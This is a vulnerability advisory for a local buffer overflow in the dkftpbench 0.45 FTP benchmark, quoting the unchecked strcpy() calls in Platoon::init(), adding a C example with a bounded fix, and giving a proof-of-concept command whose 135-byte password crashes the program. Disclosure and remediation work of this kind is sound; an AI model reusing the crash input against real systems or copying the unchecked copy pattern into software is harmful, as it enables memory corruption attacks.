[VulnWatch] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability



Description:

dkftpbench is an FTP benchmark program inspired by SPECweb99. The
result of the benchmark is a number-of-simultaneous-users rating;
after running the benchmark properly, you have a good idea how many
simultaneous dialup clients a server can support. The target bandwidth
per client is set at 28.8 kilobits/second to model dialup users; this
is important for servers on the real Internet, which often serve
thousands of clients on only 10 MBits/sec of bandwidth.
Platoon::init() copies the user name and password into the fixed
128-byte members m_username and m_passwd with strcpy() and no length
check (the server name is copied the same way). All three strings come
straight from the -u, -p and -h command-line arguments, so a value of
128 bytes or more (127 characters plus the terminating NUL is the most
that fits) writes past the member into the rest of the Platoon object,
which main() keeps on its stack. dkftpbench is an unprivileged benchmark
client; unless it is installed setuid or run with arguments from an
untrusted source, the overflow corrupts only the invoking user's own
process.
source: http://www.kegel.com/dkftpbench/

Source error:

in main():
--
int main(int argc, char **argv)
{
[..]
const char *arg_username = "anonymous";
const char *arg_password = "robouser@";

[..]
} else if (!strncmp(argv[i], "-u", 2)) {
arg_username = &argv[i][2];
} else if (!strncmp(argv[i], "-p", 2)) {
arg_password = &argv[i][2];

[..]
Platoon thePlatoon;
thePlatoon.init(poller, &sked, arg_filename,
arg_clientBandwidth, arg_minClientBandwidth, arg_mtu,
arg_hostname, arg_portnum, arg_username, arg_password,
local_addrs, n_local_addrs);

[..]
}
--

in Platoon.h:
--
/// The user name part of the URL to fetch
char m_username[128];
/// The password part of the URL to fetch
char m_passwd[128];
--

in Platoon.c:
--
void Platoon::init(Poller *poller, Sked *sked, const char *filename,
int maxBytesPerSec, int minBytesPerSec, int bytesPerRead,
const char *servername, int port,
const char *username, const char *passwd,
struct sockaddr_in *local_addrs, int n_local_addrs)
{
[..]
m_port = port;
m_sked = sked;
strcpy(m_passwd, passwd);
strcpy(m_servername, servername);
strcpy(m_username, username);
m_verbosity = 0;
m_local_addrs = local_addrs;
[..]
}
--
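As an added example (not dkftpbench code, and not part of the original advisory), here is the argument handling and the unchecked strcpy() above beside a bounded replacement, in C. struct platoon mirrors only the two 128-byte members shown in Platoon.h; parse_creds, copy_bounded, platoon_init_safe, run_poc and poc_username_len are this example's own names, and the command line run_poc builds is the advisory's with a constructed password.

```c
#include <stdio.h>
#include <string.h>

#define CRED_LEN 128   /* the size of m_username and m_passwd in Platoon.h */

/* Only the two members shown in Platoon.h; the real object has more. */
struct platoon {
    char m_username[CRED_LEN];
    char m_passwd[CRED_LEN];
};

/* Mirrors main()'s -u/-p handling: the value is whatever follows the two
 * option characters in the same argv element, so "-p21" is a password of
 * "21" and a separate "-u test" leaves the user name empty. Later flags
 * override earlier ones. */
static void parse_creds(int argc, char **argv,
                        const char **user, const char **pass)
{
    *user = "anonymous";
    *pass = "robouser@";
    for (int i = 1; i < argc; i++) {
        if (!strncmp(argv[i], "-u", 2))
            *user = &argv[i][2];
        else if (!strncmp(argv[i], "-p", 2))
            *pass = &argv[i][2];
    }
}

/* The pattern from Platoon::init: no length check, so a value of CRED_LEN
 * bytes or more writes past the member. Kept only for contrast; main()
 * below calls it with the defaults, which fit. */
static void platoon_init_unsafe(struct platoon *p,
                                const char *user, const char *pass)
{
    strcpy(p->m_passwd, pass);
    strcpy(p->m_username, user);
}

/* Bounded copy that refuses, rather than silently truncates, a value that
 * does not fit together with its terminating NUL. */
static int copy_bounded(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstlen)
        return -1;
    memcpy(dst, src, n + 1);   /* copies the NUL as well */
    return 0;
}

/* Returns 0 on success, -1 if the user name is too long, -2 if the
 * password is too long. */
static int platoon_init_safe(struct platoon *p,
                             const char *user, const char *pass)
{
    if (copy_bounded(p->m_username, sizeof p->m_username, user) < 0)
        return -1;
    if (copy_bounded(p->m_passwd, sizeof p->m_passwd, pass) < 0)
        return -2;
    return 0;
}

/* Builds the advisory's command line with a password of passwd_len 'A's
 * (constructed input) and runs it through the checked init. */
static int run_poc(size_t passwd_len)
{
    static char passopt[2 + 512 + 1];
    if (passwd_len > 512)
        return -3;
    memcpy(passopt, "-p", 2);
    memset(passopt + 2, 'A', passwd_len);
    passopt[2 + passwd_len] = '\0';

    char *argv[] = { "dkftpbench", "-n1", "-hlocalhost", "-p21",
                     "-u", "test", passopt, "-v1" };
    int argc = (int)(sizeof argv / sizeof argv[0]);
    const char *user, *pass;
    struct platoon p;

    parse_creds(argc, argv, &user, &pass);
    return platoon_init_safe(&p, user, pass);
}

/* Length of the user name main() actually sees for "-u test": zero. */
static size_t poc_username_len(void)
{
    char *argv[] = { "dkftpbench", "-u", "test" };
    const char *user, *pass;
    parse_creds(3, argv, &user, &pass);
    return strlen(user);
}

int main(void)
{
    struct platoon p;
    platoon_init_unsafe(&p, "anonymous", "robouser@");  /* defaults fit */
    printf("user name seen for \"-u test\": %zu bytes\n", poc_username_len());
    printf("127-byte password: %d\n", run_poc(127));
    printf("128-byte password: %d\n", run_poc(128));
    printf("135-byte password (advisory PoC): %d\n", run_poc(135));
    return 0;
}
```

The bounded version rejects a value of 128 bytes or more instead of truncating it, because a silently shortened password would make the benchmark log in with the wrong credential; returning the failure to main() lets it print a usage error. The same check belongs on the server name copied on the line before the user name.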

Proof of concept:

The password value is 135 bytes, eight more than m_passwd[128] can hold
together with its NUL. Note that main() takes each value from the same
argv element as its flag, so -p21 below is parsed as a password (the
port flag is -P) and is then replaced by the long -p value, and a
separate "-u test" leaves the user name empty; the -p argument alone
triggers the overflow.

$ dkftpbench -n1 -hlocalhost -p21 -u test -p`perl -e "print 'A'x135"` -v1
-h127.0.0.1 host name of ftp server
-P21 port number of ftp server
-n1 number of users
-c1 target number of simultaneous connection attempts
-k2 Start next connection when: 1=immediately, 2=after prev connect complete
-t0 length of run (in seconds)
-b3600 desired bandwidth (in bytes per second)
-B2700 min acceptable per-client bandwidth (in bytes per second)
-ufederico user name
-paaaaaa[..]
-fusenet/rec.juggling/juggling.FAQ.Z file to fetch
-m1500 bytes per 'packet'
-v1 verbosity
-sp selector (p=poll, s=select, d=/dev/poll, k=kqueue, r=rtsig, f=sig-per-fd)
-a0 use all local interfaces
Using poll()
Segmentation fault
$

--
.original http://intel.shacknet.nu/
~ starcadi
